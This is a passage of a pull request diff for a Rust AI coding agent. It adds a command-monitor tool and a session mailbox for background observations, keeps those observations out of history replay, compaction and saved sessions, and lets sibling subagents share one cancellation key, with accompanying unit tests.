### PR TITLE
feat(monitor): watch a command and hear about it later

### DIFF
--- a/maki-acp/src/server.rs
+++ b/maki-acp/src/server.rs
@@ -477,6 +477,7 @@ mod tests {
                     text: "done".into(),
                 }],
                 display_text: None,
+                ..Default::default()
             },
         ];
         let mut session: Session<Message, TokenUsage, maki_agent::ToolOutput> =

--- a/maki-acp/src/translate.rs
+++ b/maki-acp/src/translate.rs
@@ -185,7 +185,9 @@ pub fn replay_history(messages: &[Message]) -> Vec<SessionUpdate> {
 }
 
 fn replay_user(msg: &Message, updates: &mut Vec<SessionUpdate>) {
-    if let Some(text) = msg.user_text() {
+    // Belt for old sessions written before observations were filtered
+    // out: replaying one would put process output in the user's mouth.
+    if let Some(text) = msg.user_text().filter(|_| !msg.is_observation()) {
         updates.push(SessionUpdate::UserMessageChunk(ContentChunk::new(
             ContentBlock::Text(TextContent::new(text.to_string())),
         )));
@@ -286,6 +288,7 @@ mod tests {
             role: MsgRole::Assistant,
             content,
             display_text: None,
+            ..Default::default()
         }
     }
 
@@ -322,6 +325,7 @@ mod tests {
                     is_error: false,
                 }],
                 display_text: None,
+                ..Default::default()
             },
             assistant(vec![MsgBlock::Text {
                 text: "done".into(),
@@ -365,6 +369,12 @@ mod tests {
     }
 
     #[test]
+    fn replay_never_speaks_an_observation_as_the_user() {
+        let obs = Message::observation("[monitor] build failed".into());
+        assert!(updates_json(&[obs]).is_empty());
+    }
+
+    #[test]
     fn replay_failed_tool_result_maps_to_failed_status() {
         let msg = Message {
             role: MsgRole::User,
@@ -374,6 +384,7 @@ mod tests {
                 is_error: true,
             }],
             display_text: None,
+            ..Default::default()
         };
         let json = updates_json(&[msg]);
         assert_eq!(json[0]["sessionUpdate"], "tool_call_update");

--- a/maki-agent/src/agent/compaction.rs
+++ b/maki-agent/src/agent/compaction.rs
@@ -23,6 +23,9 @@ pub(super) async fn compact_history(
 ) -> Result<TokenUsage, AgentError> {
     let compact_start = std::time::Instant::now();
     let mut compaction_history: Vec<Message> = history.as_slice().to_vec();
+    // Nobody said these, and summarising a moment that has passed
+    // buys nothing, so they go before anything else is touched.
+    compaction_history = maki_providers::drop_observations(&compaction_history);
     remove_orphaned_tool_results(&mut compaction_history);
     strip_images(&mut compaction_history);
     strip_thinking(&mut compaction_history);
@@ -599,6 +602,38 @@ mod tests {
                     .flat_map(|message| &message.content)
                     .any(|block| matches!(block, ContentBlock::ToolResult { .. }))
             );
+        });
+    }
+
+    #[test]
+    fn compaction_drops_observations_and_keeps_turns() {
+        smol::block_on(async {
+            let provider = MockProvider::new(vec![Ok(text_response(StopReason::EndTurn))]);
+            let mut history = History::new(vec![
+                Message::user("fix the tests".into()),
+                Message::observation("[monitor] build failed".into()),
+                Message::observation("[monitor] build ok".into()),
+            ]);
+            let (raw_tx, _rx) = flume::unbounded();
+
+            compact_history(
+                &provider,
+                &default_model(),
+                &mut history,
+                &EventSender::new(raw_tx, 0),
+                &CancelToken::none(),
+            )
+            .await
+            .unwrap();
+
+            let requests = provider.requests.lock().unwrap();
+            let request = &requests[0];
+            assert!(request.iter().any(|message| {
+                message
+                    .user_text()
+                    .is_some_and(|text| text == "fix the tests")
+            }));
+            assert!(!request.iter().any(Message::is_observation));
         });
     }
 

--- a/maki-agent/src/agent/history.rs
+++ b/maki-agent/src/agent/history.rs
@@ -168,6 +168,7 @@ fn close_dangling_tool_calls(messages: &mut Vec<Message>, note: &str) {
         role: Role::User,
         content: error_results,
         display_text: Some(String::new()),
+        ..Default::default()
     });
 }
 
@@ -222,6 +223,7 @@ mod tests {
                 })
                 .collect(),
             display_text: Some(String::new()),
+            ..Default::default()
         }
     }
 

--- a/maki-agent/src/agent/run.rs
+++ b/maki-agent/src/agent/run.rs
@@ -20,7 +20,7 @@ use crate::permissions::PermissionManager;
 use crate::tools::{Deadline, FileReadTracker, LocalTools, ToolAudience, ToolContext};
 use crate::{
     AgentConfig, AgentError, AgentEvent, AgentInput, AgentMode, EventSender, ExtractedCommand,
-    InterruptSource, TurnCompleteEvent,
+    InterruptSource, SessionMailbox, TurnCompleteEvent,
 };
 use maki_config::ToolOutputLines;
 use maki_storage::id::SessionRef;
@@ -58,6 +58,7 @@ pub struct AgentParams {
     pub tool_output_lines: ToolOutputLines,
     pub permissions: Arc<PermissionManager>,
     pub session_id: Option<SessionRef>,
+    pub mailbox: Option<SessionMailbox>,
     pub timeouts: maki_providers::Timeouts,
     pub file_tracker: Arc<FileReadTracker>,
     pub prompt_slots: Arc<crate::prompt::ResolvedSlots>,
@@ -99,6 +100,7 @@ pub struct Agent<'h> {
     permissions: Arc<PermissionManager>,
     opts: RequestOptions,
     session_id: Option<SessionRef>,
+    mailbox: Option<SessionMailbox>,
     timeouts: maki_providers::Timeouts,
     file_tracker: Arc<FileReadTracker>,
     prompt_slots: Arc<crate::prompt::ResolvedSlots>,
@@ -138,6 +140,7 @@ impl<'h> Agent<'h> {
             post_tool_empty_retried: false,
             opts: RequestOptions::default(),
             session_id: params.session_id,
+            mailbox: params.mailbox,
             file_tracker: params.file_tracker,
             prompt_slots: params.prompt_slots,
             subagent_cancels: params.subagent_cancels,
@@ -182,20 +185,30 @@ impl<'h> Agent<'h> {
     }
 
     pub async fn run(&mut self, input: AgentInput) -> Result<(), AgentError> {
+        let AgentInput {
+            message,
+            mode,
+            images,
+            preamble,
+            thinking,
+            fast,
+            workflow,
+            prompt: _,
+        } = input;
         self.rollback_len = self.history.len();
-        let msg = Message::user_with_images(input.message.clone(), input.images);
-        self.history.push(msg);
-        self.mode = input.mode;
-        self.workflow = input.workflow;
-        self.opts = RequestOptions {
-            thinking: input.thinking,
-            fast: input.fast,
-        };
+        self.push_input_context(preamble);
+        if !message.trim().is_empty() || !images.is_empty() {
+            self.history
+                .push(Message::user_with_images(message.clone(), images));
+        }
+        self.mode = mode;
+        self.workflow = workflow;
+        self.opts = RequestOptions { thinking, fast };
 
         info!(
             model = %self.model.id,
             mode = ?self.mode,
-            message_len = input.message.len(),
+            message_len = message.len(),
             "agent run started"
         );
 
@@ -206,6 +219,17 @@ impl<'h> Agent<'h> {
         }
 
         result
+    }
+
+    fn push_input_context(&mut self, preamble: Vec<Message>) {
+        for message in preamble {
+            self.history.push(message);
+        }
+        if let Some(mailbox) = &self.mailbox {
+            for message in mailbox.drain() {
+                self.history.push(message);
+            }
+        }
     }
 
     async fn run_loop(&mut self) -> Result<(), AgentError> {
@@ -414,6 +438,7 @@ impl<'h> Agent<'h> {
             event_tx: self.event_tx.clone(),
             mode: self.mode.clone(),
             session_id: self.session_id.clone(),
+            mailbox: self.mailbox.clone(),
             tool_use_id: None,
             user_response_rx: self.user_response_rx.clone(),
             loaded_instructions: self.loaded_instructions.clone(),
@@ -486,9 +511,7 @@ impl<'h> Agent<'h> {
                     text: input.message.clone(),
                     image_count: input.images.len(),
                 })?;
-                for msg in std::mem::take(&mut input.preamble) {
-                    self.history.push(msg);
-                }
+                self.push_input_context(std::mem::take(&mut input.preamble));
                 self.mode = input.mode.clone();
                 let display = input.message.clone();
                 let wrapped = format!(
@@ -647,6 +670,7 @@ mod tests {
                     std::path::PathBuf::from("/tmp"),
                 )),
                 session_id: None,
+                mailbox: None,
                 timeouts: maki_providers::Timeouts::default(),
                 file_tracker: FileReadTracker::fresh(),
                 prompt_slots: Arc::new(crate::prompt::ResolvedSlots::default()),
@@ -675,6 +699,54 @@ mod tests {
             workflow: false,
             prompt: None,
         }
+    }
+
+    #[test]
+    fn run_ingests_preamble_then_mailbox_then_user_message() {
+        smol::block_on(async {
+            let id = maki_storage::id::MakiId::generate();
+            let mailbox = SessionMailbox::register(id);
+            SessionMailbox::notify(id, "mailbox".into(), false).unwrap();
+            let mut history = History::new(Vec::new());
+            let (mut agent, _event_rx) = make_agent(
+                MockProvider::new(vec![text_response(StopReason::EndTurn)]),
+                &mut history,
+            );
+            agent.mailbox = Some(mailbox);
+            let mut input = default_input();
+            input.preamble = vec![Message::observation("preamble".into())];
+
+            agent.run(input).await.unwrap();
+            drop(agent);
+
+            assert_eq!(history.as_slice()[0].user_text(), Some("preamble"));
+            assert_eq!(history.as_slice()[1].user_text(), Some("mailbox"));
+            assert_eq!(history.as_slice()[2].user_text(), Some("hello"));
+        });
+    }
+
+    #[test]
+    fn wake_only_run_does_not_insert_an_empty_user_turn() {
+        smol::block_on(async {
+            let id = maki_storage::id::MakiId::generate();
+            let mailbox = SessionMailbox::register(id);
+            SessionMailbox::notify(id, "failed".into(), true).unwrap();
+            let mut history = History::new(Vec::new());
+            let (mut agent, _event_rx) = make_agent(
+                MockProvider::new(vec![text_response(StopReason::EndTurn)]),
+                &mut history,
+            );
+            agent.mailbox = Some(mailbox);
+            let mut input = default_input();
+            input.message.clear();
+
+            agent.run(input).await.unwrap();
+            drop(agent);
+
+            assert_eq!(history.as_slice().len(), 2);
+            assert!(history.as_slice()[0].is_observation());
+            assert!(matches!(history.as_slice()[1].role, Role::Assistant));
+        });
     }
 
     fn drain_events(rx: &flume::Receiver<Envelope>) -> Vec<Envelope> {
@@ -954,6 +1026,7 @@ mod tests {
                         std::path::PathBuf::from("/tmp"),
                     )),
                     session_id: None,
+                    mailbox: None,
                     timeouts: maki_providers::Timeouts::default(),
                     file_tracker: FileReadTracker::fresh(),
                     prompt_slots: Arc::new(crate::prompt::ResolvedSlots::default()),

--- a/maki-agent/src/cancel.rs
+++ b/maki-agent/src/cancel.rs
@@ -5,7 +5,7 @@
 
 use std::collections::HashMap;
 use std::future::Future;
-use std::sync::atomic::{AtomicBool, Ordering};
+use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
 use std::sync::{Arc, Mutex};
 
 use event_listener::Event;
@@ -96,13 +96,25 @@ impl Drop for CancelTrigger {
     }
 }
 
-enum Entry {
-    Live(#[allow(dead_code)] CancelTrigger),
-    PreCancelled,
+/// Names one registration inside a key's list so its owner can retire it
+/// without disturbing the others registered under the same key.
+#[derive(Clone, Copy, PartialEq, Eq, Debug)]
+pub struct CancelSlot(u64);
+
+struct Slotted {
+    slot: CancelSlot,
+    trigger: Option<CancelTrigger>,
+}
+
+#[derive(Default)]
+struct Entry {
+    registrations: Vec<Slotted>,
+    cancelled: bool,
 }
 
 pub struct CancelMap<K> {
     entries: Mutex<HashMap<K, Entry>>,
+    next_slot: AtomicU64,
 }
 
 impl<K: Eq + std::hash::Hash> Default for CancelMap<K> {
@@ -115,26 +127,49 @@ impl<K: Eq + std::hash::Hash> CancelMap<K> {
     pub fn new() -> Self {
         Self {
             entries: Mutex::new(HashMap::new()),
+            next_slot: AtomicU64::new(0),
         }
     }
 
-    pub fn insert(&self, id: K, trigger: CancelTrigger) {
+    /// Registers {trigger} under {id}, alongside any already there, and
+    /// returns the slot to hand back to [`retire`](Self::retire).
+    pub fn insert(&self, id: K, trigger: CancelTrigger) -> CancelSlot {
         let mut map = self.entries.lock().unwrap_or_else(|e| e.into_inner());
-        match map.remove(&id) {
-            Some(Entry::PreCancelled) => drop(trigger),
-            _ => {
-                map.insert(id, Entry::Live(trigger));
-            }
+        let slot = CancelSlot(self.next_slot.fetch_add(1, Ordering::Relaxed));
+        let entry = map.entry(id).or_default();
+        let trigger = if entry.cancelled {
+            drop(trigger);
+            None
+        } else {
+            Some(trigger)
+        };
+        entry.registrations.push(Slotted { slot, trigger });
+        slot
+    }
+
+    /// Retires one registration, dropping its trigger when it is still
+    /// active and leaving its siblings alone.
+    pub fn retire(&self, id: &K, slot: CancelSlot) {
+        let mut map = self.entries.lock().unwrap_or_else(|e| e.into_inner());
+        let Some(entry) = map.get_mut(id) else {
+            return;
+        };
+        entry
+            .registrations
+            .retain(|registration| registration.slot != slot);
+        if entry.registrations.is_empty() {
+            map.remove(id);
         }
     }
 
+    /// Cancels everything under {id} and marks later siblings cancelled.
+    /// The entry stays until every registered sibling retires.
     pub fn cancel_or_precancel(&self, id: K) {
         let mut map = self.entries.lock().unwrap_or_else(|e| e.into_inner());
-        match map.remove(&id) {
-            Some(Entry::Live(_)) => {} // trigger dropped, fires cancel
-            _ => {
-                map.insert(id, Entry::PreCancelled);
-            }
+        let entry = map.entry(id).or_default();
+        entry.cancelled = true;
+        for registration in &mut entry.registrations {
+            drop(registration.trigger.take());
         }
     }
 
@@ -143,6 +178,14 @@ impl<K: Eq + std::hash::Hash> CancelMap<K> {
             .lock()
             .unwrap_or_else(|e| e.into_inner())
             .remove(id);
+    }
+
+    #[cfg(test)]
+    fn has_key(&self, id: &K) -> bool {
+        self.entries
+            .lock()
+            .unwrap_or_else(|e| e.into_inner())
+            .contains_key(id)
     }
 
     pub fn cancel_all(&self) {
@@ -250,13 +293,13 @@ mod tests {
     }
 
     #[test]
-    fn cancel_map_remove_clears_precancelled() {
+    fn cancel_map_remove_clears_cancelled() {
         let map: CancelMap<String> = CancelMap::new();
         map.cancel_or_precancel("t1".to_owned());
         map.remove(&"t1".to_owned());
         let (trigger, token) = CancelToken::new();
         map.insert("t1".to_owned(), trigger);
-        assert!(!token.is_cancelled(), "remove should clear PreCancelled");
+        assert!(!token.is_cancelled(), "remove should clear cancellation");
     }
 
     #[test]
@@ -272,7 +315,7 @@ mod tests {
     }
 
     #[test]
-    fn cancel_map_cancel_all_clears_precancelled() {
+    fn cancel_map_cancel_all_clears_cancelled() {
         let map: CancelMap<String> = CancelMap::new();
         map.cancel_or_precancel("t1".to_owned());
         map.cancel_all();
@@ -280,23 +323,114 @@ mod tests {
         map.insert("t1".to_owned(), trigger);
         assert!(
             !token.is_cancelled(),
-            "cancel_all should clear PreCancelled entries"
+            "cancel_all should clear cancelled entries"
         );
     }
 
+    /// One tool call can open several subagents. They used to evict each
+    /// other, so the first died the moment the second registered.
     #[test]
-    fn cancel_map_insert_overwrites_live() {
+    fn cancel_map_keeps_siblings_under_one_key() {
         let map = CancelMap::new();
         let (t1, tok1) = CancelToken::new();
         let (t2, tok2) = CancelToken::new();
         map.insert("x".to_owned(), t1);
         map.insert("x".to_owned(), t2);
-        assert!(
-            tok1.is_cancelled(),
-            "first trigger should be dropped on overwrite"
-        );
-        assert!(!tok2.is_cancelled(), "second trigger should remain live");
+        assert!(!tok1.is_cancelled(), "a sibling must not evict the first");
+        assert!(!tok2.is_cancelled());
+
+        map.cancel_or_precancel("x".to_owned());
+        assert!(tok1.is_cancelled(), "cancelling the key stops them all");
+        assert!(tok2.is_cancelled());
+    }
+
+    #[test]
+    fn cancel_map_retire_leaves_siblings_running() {
+        let map = CancelMap::new();
+        let (t1, tok1) = CancelToken::new();
+        let (t2, tok2) = CancelToken::new();
+        let slot1 = map.insert("x".to_owned(), t1);
+        map.insert("x".to_owned(), t2);
+
+        map.retire(&"x".to_owned(), slot1);
+        assert!(tok1.is_cancelled(), "retiring drops that trigger");
+        assert!(!tok2.is_cancelled(), "the sibling keeps running");
+
         map.cancel_or_precancel("x".to_owned());
         assert!(tok2.is_cancelled());
+    }
+
+    /// The last one out clears the key so it can be reused.
+    #[test]
+    fn cancel_map_retiring_the_last_registration_clears_the_key() {
+        let map = CancelMap::new();
+        let (t1, _tok1) = CancelToken::new();
+        let slot = map.insert("x".to_owned(), t1);
+        assert!(map.has_key(&"x".to_owned()));
+
+        map.retire(&"x".to_owned(), slot);
+        assert!(!map.has_key(&"x".to_owned()), "empty key must be dropped");
+    }
+
+    /// Cancelling before anything registers has to catch every session the
+    /// tool call goes on to open, not just the first one through the door.
+    #[test]
+    fn cancel_map_precancel_catches_every_later_sibling() {
+        let map: CancelMap<String> = CancelMap::new();
+        map.cancel_or_precancel("x".to_owned());
+
+        let (t1, tok1) = CancelToken::new();
+        let (t2, tok2) = CancelToken::new();
+        let slot1 = map.insert("x".to_owned(), t1);
+        let slot2 = map.insert("x".to_owned(), t2);
+        assert!(tok1.is_cancelled());
+        assert!(
+            tok2.is_cancelled(),
+            "the mark must outlive the first insert"
+        );
+
+        map.retire(&"x".to_owned(), slot1);
+        assert!(map.has_key(&"x".to_owned()));
+        map.retire(&"x".to_owned(), slot2);
+        assert!(!map.has_key(&"x".to_owned()));
+    }
+
+    /// Pressing esc while a fan-out is running must also stop the sibling
+    /// that starts a moment later.
+    #[test]
+    fn cancel_map_cancel_catches_a_sibling_registered_after() {
+        let map = CancelMap::new();
+        let (t1, tok1) = CancelToken::new();
+        let slot1 = map.insert("x".to_owned(), t1);
+
+        map.cancel_or_precancel("x".to_owned());
+        assert!(tok1.is_cancelled());
+
+        let (t2, tok2) = CancelToken::new();
+        let slot2 = map.insert("x".to_owned(), t2);
+        assert!(tok2.is_cancelled(), "cancel left no mark for the sibling");
+
+        map.retire(&"x".to_owned(), slot1);
+        assert!(map.has_key(&"x".to_owned()));
+        map.retire(&"x".to_owned(), slot2);
+        assert!(!map.has_key(&"x".to_owned()));
+
+        let (t3, tok3) = CancelToken::new();
+        map.insert("x".to_owned(), t3);
+        assert!(
+            !tok3.is_cancelled(),
+            "the completed call must not poison a reused tool id"
+        );
+    }
+
+    #[test]
+    fn cancel_map_insert_into_cancelled_returns_retirement_slot() {
+        let map = CancelMap::new();
+        map.cancel_or_precancel("x".to_owned());
+        let (trigger, token) = CancelToken::new();
+        let slot = map.insert("x".to_owned(), trigger);
+        assert!(token.is_cancelled());
+        map.retire(&"x".to_owned(), slot);
+        assert!(!map.has_key(&"x".to_owned()));
     }
 }

--- a/maki-agent/src/headless.rs
+++ b/maki-agent/src/headless.rs
@@ -61,7 +61,7 @@ impl SessionStore {
     }
 
     fn record_turn(&mut self, messages: &[Message], model_spec: String) {
-        self.session.messages = messages.to_vec();
+        self.session.messages = maki_providers::drop_observations(messages);
         self.session.model = model_spec;
         self.session.update_title_if_default();
         self.save();
@@ -539,6 +539,23 @@ mod tests {
         let loaded = load(&tmp);
         assert_eq!(loaded.messages.len(), 1);
         assert_eq!(loaded.title, generate_title(&messages));
+    }
+
+    #[test]
+    fn record_turn_does_not_persist_observations() {
+        let tmp = TempDir::new().unwrap();
+        let mut store = store_in(&tmp);
+        store.record_turn(
+            &[
+                Message::user("fix the login bug".into()),
+                Message::observation("build failed".into()),
+            ],
+            MODEL_SPEC.into(),
+        );
+
+        let loaded = load(&tmp);
+        assert_eq!(loaded.messages.len(), 1);
+        assert!(!loaded.messages[0].is_observation());
     }
 
     #[test]

--- a/maki-agent/src/headless.rs
+++ b/maki-agent/src/headless.rs
@@ -22,7 +22,7 @@ use crate::template;
 use crate::tools::{DescriptionContext, FileReadTracker, ToolAudience, ToolFilter, ToolRegistry};
 use crate::{
     Agent, AgentConfig, AgentEvent, AgentInput, AgentMode, AgentParams, AgentRunParams, Envelope,
-    EventSender, ImageSource, McpHandle, McpSession, PermissionsConfig, ToolOutput,
+    EventSender, ImageSource, McpHandle, McpSession, PermissionsConfig, SessionMailbox, ToolOutput,
     ToolOutputLines,
 };
 
@@ -180,6 +180,7 @@ pub fn spawn(params: HeadlessParams) -> HeadlessHandle {
     let session_id = MakiId::generate();
     let session_ref = SessionRef::from(session_id);
     let session_ref_clone = session_ref.clone();
+    let mailbox = SessionMailbox::register(session_id);
     let fast = params.fast;
     let workflow = params.workflow;
     let task = smol::spawn({
@@ -212,6 +213,7 @@ pub fn spawn(params: HeadlessParams) -> HeadlessHandle {
                         working_dir_path,
                     )),
                     session_id: Some(session_ref_clone.clone()),
+                    mailbox: Some(mailbox.clone()),
                     timeouts: params.timeouts,
                     file_tracker: FileReadTracker::fresh(),
                     prompt_slots: Arc::new(params.prompt_slots),
@@ -325,6 +327,7 @@ pub fn spawn_interactive(params: InteractiveParams) -> InteractiveHandle {
             (id, SessionRef::from(id))
         }
     };
+    let mailbox = SessionMailbox::register(session_id);
 
     let working_dir = params.initial_wd.to_string_lossy().into_owned();
     let permissions = Arc::new(PermissionManager::new(
@@ -424,6 +427,7 @@ pub fn spawn_interactive(params: InteractiveParams) -> InteractiveHandle {
                         tool_output_lines: ToolOutputLines::default(),
                         permissions: Arc::clone(&permissions),
                         session_id: Some(session_ref_clone.clone()),
+                        mailbox: Some(mailbox.clone()),
                         timeouts: params.timeouts,
                         file_tracker: Arc::clone(&file_tracker),
                         prompt_slots: Arc::clone(&params.prompt_slots),

--- a/maki-agent/src/lib.rs
+++ b/maki-agent/src/lib.rs
@@ -5,6 +5,7 @@ pub mod cancel;
 pub mod child_guard;
 pub use child_guard::ChildGuard;
 pub mod headless;
+pub mod mailbox;
 pub mod mcp;
 pub use mcp::config::{McpConfigError, McpConfigErrors, McpServerInfo, McpServerStatus};
 pub use mcp::protocol::PromptRole;
@@ -17,6 +18,7 @@ pub use agent::{
     find_subdirectory_instructions, is_instruction_file,
 };
 pub use cancel::{CancelMap, CancelToken, CancelTrigger};
+pub use mailbox::{MailboxError, SessionMailbox};
 pub use maki_config::{AgentConfig, PermissionsConfig, ToolOutputLines};
 pub mod command;
 pub mod diff;

--- a/maki-agent/src/mailbox.rs
+++ b/maki-agent/src/mailbox.rs
@@ -1,0 +1,198 @@
+use std::collections::HashMap;
+use std::sync::{Arc, LazyLock, Mutex, MutexGuard, PoisonError, Weak};
+
+use maki_providers::Message;
+use maki_storage::id::MakiId;
+use thiserror::Error;
+
+static MAILBOXES: LazyLock<Mutex<HashMap<MakiId, Weak<Mutex<State>>>>> =
+    LazyLock::new(|| Mutex::new(HashMap::new()));
+
+#[derive(Default)]
+struct State {
+    pending: Vec<Message>,
+    wake: bool,
+}
+
+#[derive(Debug, Error)]
+#[error("session not live: {0}")]
+pub struct MailboxError(MakiId);
+
+#[derive(Clone)]
+pub struct SessionMailbox {
+    session_id: MakiId,
+    state: Arc<Mutex<State>>,
+}
+
+fn lock<T>(mutex: &Mutex<T>) -> MutexGuard<'_, T> {
+    mutex.lock().unwrap_or_else(PoisonError::into_inner)
+}
+
+impl SessionMailbox {
+    pub fn register(session_id: MakiId) -> Self {
+        let mut mailboxes = lock(&MAILBOXES);
+        if let Some(state) = mailboxes.get(&session_id).and_then(Weak::upgrade) {
+            return Self { session_id, state };
+        }
+
+        let state = Arc::new(Mutex::new(State::default()));
+        mailboxes.insert(session_id, Arc::downgrade(&state));
+        Self { session_id, state }
+    }
+
+    pub fn notify(session_id: MakiId, text: String, wake: bool) -> Result<(), MailboxError> {
+        let mailbox = {
+            let mut mailboxes = lock(&MAILBOXES);
+            let Some(state) = mailboxes.get(&session_id).and_then(Weak::upgrade) else {
+                mailboxes.remove(&session_id);
+                return Err(MailboxError(session_id));
+            };
+            Self { session_id, state }
+        };
+        let mut state = lock(&mailbox.state);
+        state.pending.push(Message::observation(text));
+        state.wake |= wake;
+        Ok(())
+    }
+
+    pub fn drain(&self) -> Vec<Message> {
+        let mut state = lock(&self.state);
+        state.wake = false;
+        std::mem::take(&mut state.pending)
+    }
+
+    pub fn claim_wake(&self) -> Vec<Message> {
+        let mut state = lock(&self.state);
+        if !state.wake {
+            return Vec::new();
+        }
+        state.wake = false;
+        std::mem::take(&mut state.pending)
+    }
+}
+
+impl Drop for SessionMailbox {
+    fn drop(&mut self) {
+        if Arc::strong_count(&self.state) != 1 {
+            return;
+        }
+        let weak = Arc::downgrade(&self.state);
+        let mut mailboxes = lock(&MAILBOXES);
+        if Arc::strong_count(&self.state) == 1
+            && mailboxes
+                .get(&self.session_id)
+                .is_some_and(|registered| registered.ptr_eq(&weak))
+        {
+            mailboxes.remove(&self.session_id);
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn text(message: &Message) -> &str {
+        message.user_text().unwrap()
+    }
+
+    #[test]
+    fn notifications_drain_in_order_and_clear_wake() {
+        let id = MakiId::generate();
+        let mailbox = SessionMailbox::register(id);
+        SessionMailbox::notify(id, "first".into(), true).unwrap();
+        SessionMailbox::notify(id, "second".into(), true).unwrap();
+
+        let messages = mailbox.drain();
+        assert_eq!(
+            messages.iter().map(text).collect::<Vec<_>>(),
+            ["first", "second"]
+        );
+        assert!(messages.iter().all(Message::is_observation));
+        assert!(mailbox.claim_wake().is_empty());
+    }
+
+    #[test]
+    fn quiet_notifications_do_not_claim_a_wake() {
+        let id = MakiId::generate();
+        let mailbox = SessionMailbox::register(id);
+        SessionMailbox::notify(id, "built".into(), false).unwrap();
+
+        assert!(mailbox.claim_wake().is_empty());
+        assert_eq!(mailbox.drain().len(), 1);
+    }
+
+    #[test]
+    fn waking_notification_claims_all_pending_messages() {
+        let id = MakiId::generate();
+        let mailbox = SessionMailbox::register(id);
+        SessionMailbox::notify(id, "quiet".into(), false).unwrap();
+        SessionMailbox::notify(id, "wake".into(), true).unwrap();
+
+        let messages = mailbox.claim_wake();
+        assert_eq!(
+            messages.iter().map(text).collect::<Vec<_>>(),
+            ["quiet", "wake"]
+        );
+        assert!(mailbox.drain().is_empty());
+    }
+
+    #[test]
+    fn registrations_for_the_same_id_share_state() {
+        let id = MakiId::generate();
+        let first = SessionMailbox::register(id);
+        let second = SessionMailbox::register(id);
+        SessionMailbox::notify(id, "built".into(), false).unwrap();
+
+        assert_eq!(second.drain().len(), 1);
+        assert!(first.drain().is_empty());
+    }
+
+    #[test]
+    fn dropping_the_last_registration_closes_the_mailbox() {
+        let id = MakiId::generate();
+        drop(SessionMailbox::register(id));
+
+        assert!(!lock(&MAILBOXES).contains_key(&id));
+        assert!(SessionMailbox::notify(id, "late".into(), false).is_err());
+    }
+
+    #[test]
+    fn dropping_one_registration_keeps_the_shared_mailbox() {
+        let id = MakiId::generate();
+        let first = SessionMailbox::register(id);
+        let second = SessionMailbox::register(id);
+
+        drop(first);
+
+        assert!(lock(&MAILBOXES).contains_key(&id));
+        SessionMailbox::notify(id, "built".into(), false).unwrap();
+        assert_eq!(second.drain().len(), 1);
+    }
+
+    #[test]
+    fn stale_drop_does_not_remove_a_replacement() {
+        let id = MakiId::generate();
+        let stale = SessionMailbox::register(id);
+        let replacement = SessionMailbox {
+            session_id: id,
+            state: Arc::new(Mutex::new(State::default())),
+        };
+        lock(&MAILBOXES).insert(id, Arc::downgrade(&replacement.state));
+
+        drop(stale);
+        SessionMailbox::notify(id, "built".into(), false).unwrap();
+
+        assert_eq!(replacement.drain().len(), 1);
+    }
+
+    #[test]
+    fn legacy_and_canonical_ids_address_the_same_mailbox() {
+        let legacy: MakiId = "01965087-4c71-7f00-8000-000000000001".parse().unwrap();
+        let canonical: MakiId = legacy.to_string().parse().unwrap();
+        let mailbox = SessionMailbox::register(legacy);
+        SessionMailbox::notify(canonical, "built".into(), false).unwrap();
+
+        assert_eq!(mailbox.drain().len(), 1);
+    }
+}

--- a/maki-agent/src/mcp/mod.rs
+++ b/maki-agent/src/mcp/mod.rs
@@ -1586,6 +1586,7 @@ mod tests {
                 tool_use("gone__tool"),
             ],
             display_text: None,
+            ..Default::default()
         }];
         let restored = McpSession::new(session.handle.clone(), &history);
         let mut tools = json!([]);
@@ -1669,6 +1670,7 @@ mod tests {
                 input: json!({}),
             }],
             display_text: None,
+            ..Default::default()
         }];
         let restored = McpSession::new(session.handle.clone(), &history);
         let mut tools = json!([]);

--- a/maki-agent/src/tools/mod.rs
+++ b/maki-agent/src/tools/mod.rs
@@ -198,6 +198,7 @@ pub struct ToolContext {
     /// so a tool can always tell which conversation it is serving. `None`
     /// when there is no session at all, like the `maki index` one-shot.
     pub session_id: Option<SessionRef>,
+    pub mailbox: Option<crate::SessionMailbox>,
     pub tool_use_id: Option<String>,
     pub user_response_rx: Option<Arc<async_lock::Mutex<flume::Receiver<String>>>>,
     pub loaded_instructions: LoadedInstructions,
@@ -420,6 +421,7 @@ pub fn interpreter_ctx(
         event_tx: event_tx.clone(),
         mode: mode.clone(),
         session_id: None,
+        mailbox: None,
         tool_use_id: None,
         user_response_rx,
         loaded_instructions: LoadedInstructions::new(),

--- a/maki-config/src/lib.rs
+++ b/maki-config/src/lib.rs
@@ -61,6 +61,7 @@ pub const DEFAULT_BUILTINS: &[&str] = &[
     "grep",
     "index",
     "memory",
+    "monitor",
     "question",
     "read",
     "sessions",

--- a/maki-docgen/src/gen_tools.rs
+++ b/maki-docgen/src/gen_tools.rs
@@ -30,7 +30,14 @@ const SECTIONS: &[(&str, &[&str])] = &[
     ),
     (
         "Execution & Control",
-        &["batch", "code_execution", "question"],
+        &[
+            "batch",
+            "code_execution",
+            "question",
+            "monitor",
+            "monitor_stop",
+            "monitor_list",
+        ],
     ),
     (
         "Agent & Knowledge",
@@ -111,6 +118,11 @@ fn extract_params(schema: &Value) -> Vec<Param> {
 }
 
 fn write_param_table(out: &mut String, params: &[Param]) {
+    // A tool that takes nothing would otherwise get a header with no rows
+    // under it, which renders as an empty box.
+    if params.is_empty() {
+        return;
+    }
     let has_defaults = params.iter().any(|p| !p.default.is_empty());
     let header = if has_defaults {
         "| Parameter | Type | Required | Default | Description |\n|-----------|------|----------|---------|-------------|"

--- a/maki-lua/src/api/agent.rs
+++ b/maki-lua/src/api/agent.rs
@@ -9,7 +9,7 @@ use std::time::{Duration, Instant};
 use async_lock::Mutex as AsyncMutex;
 use futures::future::{Either, select};
 use maki_agent::agent::tool_dispatch::{self, Emit};
-use maki_agent::cancel::CancelMap;
+use maki_agent::cancel::{CancelMap, CancelSlot};
 use maki_agent::tools::interpreter_bridge;
 use maki_agent::tools::registry::ToolRegistry;
 use maki_agent::tools::schema::sanitize_tool_input_schema;
@@ -523,7 +523,9 @@ async fn session(
         .clone()
         .unwrap_or_else(|| format!("session-{}", MakiId::generate()));
     let (child_trigger, child_cancel) = agent_ctx.cancel.child();
-    agent_ctx
+    // Several sessions can share one `ui_id`, so keep the slot and retire
+    // only ours on close instead of clearing the whole key.
+    let cancel_slot = agent_ctx
         .subagent_cancels
         .insert(ui_id.clone(), child_trigger);
 
@@ -561,6 +563,7 @@ async fn session(
         answer_tx: Some(answer_tx),
         parent_cancels: Arc::clone(&agent_ctx.subagent_cancels),
         ui_id,
+        cancel_slot,
